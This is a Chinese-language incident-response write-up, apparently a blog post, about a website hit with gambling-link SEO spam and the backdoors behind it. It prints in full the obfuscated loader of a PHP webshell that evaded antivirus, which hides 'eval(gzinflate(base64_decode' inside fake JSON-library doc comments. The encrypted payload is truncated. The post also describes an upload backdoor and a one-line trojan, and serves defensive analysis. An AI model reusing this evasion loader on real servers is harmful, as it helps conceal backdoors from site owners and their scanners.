一次对某组织的应急响应

前言

前一阵子接到某平台被挂BC的求助,顺手帮他们看了下,没想到捡了几个过了市面上主流防护软件的马子,查了下资料,发现免杀的思路是真的骚

经过

首先观察下被挂BC的站点是什么状态

搜索引擎表现为为被植入了寄生虫引流页面

1567605665584

搜索引擎访问跳转到www.xxxx.com,直接输入网址不跳,判断为JS检测referer进行跳转

1567603788229

然后要来了网站的源码,全局搜索这个网址,果真发现了这个链接

同时跟网站管理员索取了最近一段时间的访问日志,进行排查,由于有了修改的文件,所以直接在日志中搜索这个文件名,排查到了一个webshell路径......\caches_data\model_f1eld_0.cache.php

1567603927497

源码中看看这个shell长什么样,通过URI猜测是个大马

<?php

/**
* Converts to and from JSON format.
*
* JSON (JavaScript Object Notation) is a lightweight data-interchange
* format. It is easy for humans to read and write. It is easy for machines
* to parse and generate. It is based on a subset of the JavaScript
* Programming Language, Standard ECMA-262 3rd Edition - December 1999.
* This feature can also be found in Python. JSON is a text format that is
* completely language independent but uses conventions that are familiar
* to programmers of the C-family of languages, including C, C++, C#, Java,
* JavaScript, Perl, TCL, and many others. These properties make JSON an
* ideal data-interchange language.
*
* This package provides a simple encoder and decoder for JSON notation. It
* is intended for use with client-side Javascript applications that make
* use of HTTPRequest to perform server communication functions - data can
* be encoded into JSON notation for use in a client-side javascript, or
* decoded from incoming Javascript requests. JSON format is native to
* Javascript, and can be directly with no further parsing
* overhead
*
* All strings should be in ASCII or UTF-8 format!
*
* LICENSE: Redistribution and use in source and binary forms, with or
* without modification, are permitted provided that the following
* conditions are met: Redistributions of source code must retain the
* above copyright notice, this list of conditions and the following
* disclaimer. Redistributions in binary form must reproduce the above
* copyright notice, this list of conditions and the following disclaimer
* in the documentation and/or other materials provided with the
* distribution.
*
* THIS SOFTWARE IS PROVIDED AND ANY EXPRESS OR IMPLIED
* WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
* MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN
* NO EVENT SHALL CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
* BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
* OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
* ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR
* TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
* USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH
* DAMAGE.
*
* @category
* @package     Services_JSON
* @author     Michal Migurski <mike-json@teczno.com>
* @author     Matt Knapp <mdknapp[at]gmail[dot]com>
* @author     Brett Stimmerman <brettstimmerman[at]gmail[dot]com>
* @copyright   2005 Michal Migurski
* @version     CVS: : JSON.php,v 1.31 2006/06/28 05:54:17 migurski Exp
* @license     http://www.opensource.org/licenses/bsd-license.php
* @link       http://pear.php.net/pepr/pepr-proposal-show.php?id=198
*/
/**
* Converts to and from JSON format.
*
* JSON (JavaScript Object Notation) is a lightweight data-interchange
* format. It is easy for humans to read and write. It is easy for machines
* to parse and generate. It is based on a subset of the JavaScript
* Programming Language, Standard ECMA-262 3rd Edition - December 1999.
* This feature can also be found in Python. JSON is a text format that is
* completely language independent but uses conventions that are familiar
* to programmers of the C-family of languages, including C, C++, C#, Java,
* JavaScript, Perl, TCL, and many others. These properties make JSON an
* ideal data-interchange language.
*
* This package provides a simple encoder and decoder for JSON notation. It
* is intended for use with client-side Javascript applications that make
* use of HTTPRequest to perform server communication functions - data can
* be encoded into JSON notation for use in a client-side javascript, or
* decoded from incoming Javascript requests. JSON format is native to
* Javascript, and can be directly with no further parsing
* overhead
*
* All strings should be in ASCII or UTF-8 format!
*
* LICENSE: Redistribution and use in source and binary forms, with or
* without modification, are permitted provided that the following
* conditions are met: Redistributions of source code must retain the
* above copyright notice, this list of conditions and the following
* disclaimer. Redistributions in binary form must reproduce the above
* copyright notice, this list of conditions and the following disclaimer
* in the documentation and/or other materials provided with the
* distribution.
*
* THIS SOFTWARE IS PROVIDED AND ANY EXPRESS OR IMPLIED
* WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
* MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN
* NO EVENT SHALL CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
* BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
* OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
* ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR
* TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
* USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH
* DAMAGE.
*
* @category
* @package     Services_JSON
* @author     Michal Migurski <mike-json@teczno.com>
* @author     Matt Knapp <mdknapp[at]gmail[dot]com>
* @author     Brett Stimmerman <brettstimmerman[at]gmail[dot]com>
* @copyright   2005 Michal Migurski
* @version     CVS: : JSON.php,v 1.31 2006/06/28 05:54:17 migurski Exp $
* @license     http://www.opensource.org/licenses/bsd-license.php
* @link       http://pear.php.net/pepr/pepr-proposal-show.php?id=198
*/
$ffname=""."code(\"
7L1pexvXlS762Xme/AcEzTbIhCJrHkRRcY22HE0W5VFys0ECJGGRAAKAGmzpPnYnTuwkjp2TpDM5U3fScXcndnI6J+14iP/LbYGSP52/cN937yqgqlAAKdudzul7mFgEC7v2uPZa71p7rbU7G+v9Qb03mF9Y+fSnmr1ep7fea3Y7vUGrvT0frUcXLpy7ULlZidbPexfWIhZ6oN8crA9ae8313dZeazCv8OFcr9MZrDdavcpqZW59LbrwWHThUi08Fzx6Jjp7cf3CuXMXa0+jnPzf1n57c9DqtCsX+NaD5+fvn6v3evUbC5/+1HOf/lQFP9d2WrvN+d1WfzA/d6V5Y3Huar23gLqb9c2d+aTwgiyavMGf1tb8fH/QG3T2u91mT7y5UPkMeoQPlZs3K7XaUqs9uFrf
【加密的代码太长,省略掉】
\")));";

/**
* Converts to and from JSON format.
*
* JSON (JavaScript Object Notation) is a lightweight data-interchange
* format. It is easy for humans to read and write. It is easy for machines
* to parse and generate. It is based on a subset of the JavaScript
* Programming Language, Standard ECMA-262 3rd Edition - December 1999.
* This feature can also be found in Python. JSON is a text format that is
* completely language independent but uses conventions that are familiar
* to programmers of the C-family of languages, including C, C++, C#, Java,
* JavaScript, Perl, TCL, and many others. These properties make JSON an
* ideal data-interchange language.
*
* This package provides a simple encoder and decoder for JSON notation. It
* is intended for use with client-side Javascript applications that make
* use of HTTPRequest to perform server communication functions - data can
* be encoded into JSON notation for use in a client-side javascript, or
* decoded from incoming Javascript requests. JSON format is native to
* Javascript, and can be directly with no further parsing
* overhead
*
* All strings should be in ASCII or UTF-8 format!
*
* LICENSE: Redistribution and use in source and binary forms, with or
* without modification, are permitted provided that the following
* conditions are met: Redistributions of source code must retain the
* above copyright notice, this list of conditions and the following
* disclaimer. Redistributions in binary form must reproduce the above
* copyright notice, this list of conditions and the following disclaimer
* in the documentation and/or other materials provided with the
* distribution.val(gzinflate(base
* THIS SOFTWARE IS PROVIDED AND ANY EXPRESS OR IMPLIED
* WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
* MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN
* NO EVENT SHALL CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
* BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
* OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
* ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR
* TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
* USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH
* DAMAGE.
*
* @category
* @package     Services_JSON
* @author     Michal Migurski <mike-json@teczno.com>
* @author     Matt Knapp <mdknapp[at]gmail[dot]com>
* @author     Brett Stimmerman <brettstimmerman[at]gmail[dot]com>
* @copyright   2005 Michal Migurski
* @version     CVS: : JSON.php,v 1.31 2006/06/28 05:54:17 migurski Exp $
* @license     http://www.opensource.org/licenses/bsd-license.php
* @link       http://pear.php.net/pepr/pepr-proposal-show.php?id=198
*/
class Test{
   private $math;
   public function dos($y){
       $a = $this->math;
       return $a("", $y);
  }
   public function get_info(){
       $comm = "";
       try{
           $this->math = strrev("noitcnuf_etaerc");
           $rec = new ReflectionClass("Test");
           global $comm;
           $comm =  $rec->getDocComment();
           throw new ReflectionException();
      }catch (ReflectionException $e){
           $start = strpos($comm,"val");
           $end = strpos($comm,"(base");
           return "e".substr($comm, $start, ($end-$start+5))."64_de";
      }
  }
}
$test = new Test();
$info = $test->dos($test->get_info().$ffname);
$info();

简单看了下,PHP大马特征较为明显,主流防护软件全部没有检出,简单对功能代码讲解下

/**
* Converts to and from JSON format.
*
* JSON (JavaScript Object Notation) is a lightweight data-interchange
* format. It is easy for humans to read and write. It is easy for machines
* to parse and generate. It is based on a subset of the JavaScript
* Programming Language, Standard ECMA-262 3rd Edition - December 1999.
* This feature can also be found in Python. JSON is a text format that is
* completely language independent but uses conventions that are familiar
* to programmers of the C-family of languages, including C, C++, C#, Java,
* JavaScript, Perl, TCL, and many others. These properties make JSON an
* ideal data-interchange language.
*
* This package provides a simple encoder and decoder for JSON notation. It
* is intended for use with client-side Javascript applications that make
* use of HTTPRequest to perform server communication functions - data can
* be encoded into JSON notation for use in a client-side javascript, or
* decoded from incoming Javascript requests. JSON format is native to
* Javascript, and can be directly with no further parsing
* overhead
*
* All strings should be in ASCII or UTF-8 format!
*
* LICENSE: Redistribution and use in source and binary forms, with or
* without modification, are permitted provided that the following
* conditions are met: Redistributions of source code must retain the
* above copyright notice, this list of conditions and the following
* disclaimer. Redistributions in binary form must reproduce the above
* copyright notice, this list of conditions and the following disclaimer
* in the documentation and/or other materials provided with the
* distribution.val(gzinflate(base
* THIS SOFTWARE IS PROVIDED AND ANY EXPRESS OR IMPLIED
* WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
* MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN
* NO EVENT SHALL CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
* BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
* OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
* ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR
* TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
* USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH
* DAMAGE.
*
* @category
* @package     Services_JSON
* @author     Michal Migurski <mike-json@teczno.com>
* @author     Matt Knapp <mdknapp[at]gmail[dot]com>
* @author     Brett Stimmerman <brettstimmerman[at]gmail[dot]com>
* @copyright   2005 Michal Migurski
* @version     CVS: : JSON.php,v 1.31 2006/06/28 05:54:17 migurski Exp $
* @license     http://www.opensource.org/licenses/bsd-license.php
* @link       http://pear.php.net/pepr/pepr-proposal-show.php?id=198
*/
class Test{
   private $math;
   public function dos($y){
       $a = $this->math;
       return $a("", $y);
  }
   public function get_info(){
       $comm = "";
       try{
           $this->math = strrev("noitcnuf_etaerc");
           $rec = new ReflectionClass("Test");
           global $comm;
           $comm =  $rec->getDocComment();
           throw new ReflectionException();
      }catch (ReflectionException $e){
           $start = strpos($comm,"val");
           $end = strpos($comm,"(base");
           return "e".substr($comm, $start, ($end-$start+5))."64_de";
      }
  }
}
$test = new Test();
$info = $test->dos($test->get_info().$ffname);
$info();

代码中包含了一个Test类,Test类中包含了成员$mathdosget_info方法,其中get_info方法干了这么几件事

  1. 尝试将翻转后的create_function赋值给成员$math
  2. 实例化用于报告Test类有关信息的ReflectionClass
  3. 调用ReflectionClass::getDocComment$comm赋值为文档注释
  4. 抛出异常并被异常处理捕获
  5. 获取val第一次出现的位置
  6. 获取(base第一次出现的位置
  7. 拼接字符串为eval(gzinflate(base64_de

然后,马子实例化了Test类,并且调用了dos方法创建了一个匿名函数,解密代码运行后的代码为create_function(eval(gzinflate(base64_de,看到这里发现base64_decode函数不完整,推测完整的部分在$ffname变量中存储,于是花了点时间解密了下发现完整的代码是create_function(eval(gzinflate(base64_decode(大马加密后的代码)))

大马解密后的部分代码如下

1567605236959

单看密码处理部分的加密方式md5(substr(md5(substr(md5($salt.$post_pass),5)),3));可以看到大马被捕获后密码被爆破的可能性为0

由于日志中没有出现大马是怎么被植入到深层目录中的,判断该站被植入了不止一个后门,联系网站负责人后告知删除该木马并对可能存在的漏洞进行修复后备份整站(数据库、图片、源码),等待攻击者下一次进行攻击再进行清理

2天后网站果然被再次植入BC链接

1567605903429

随后要来访问日志对攻击者的攻击链进行分析,详情见图

1567606038820

发现访问了......\languages\en\cntw.lang.php

在网站源码中确实发现了这个文件,打开后发现是个加密后的上传后门,当以get形式获取到的值为str时,显现出上传界面并可以上传到任意目录(只要权限够大)

1567606204796

后记

在后续的复查中又发现了与大马使用的类似思路的一句话木马,位于....../api/uc_client/data/cache/config.php,由于该组织保存的日志时间较短,无法分析出攻击者采用的攻击方式,为本次应急中的不足之处。

参与评论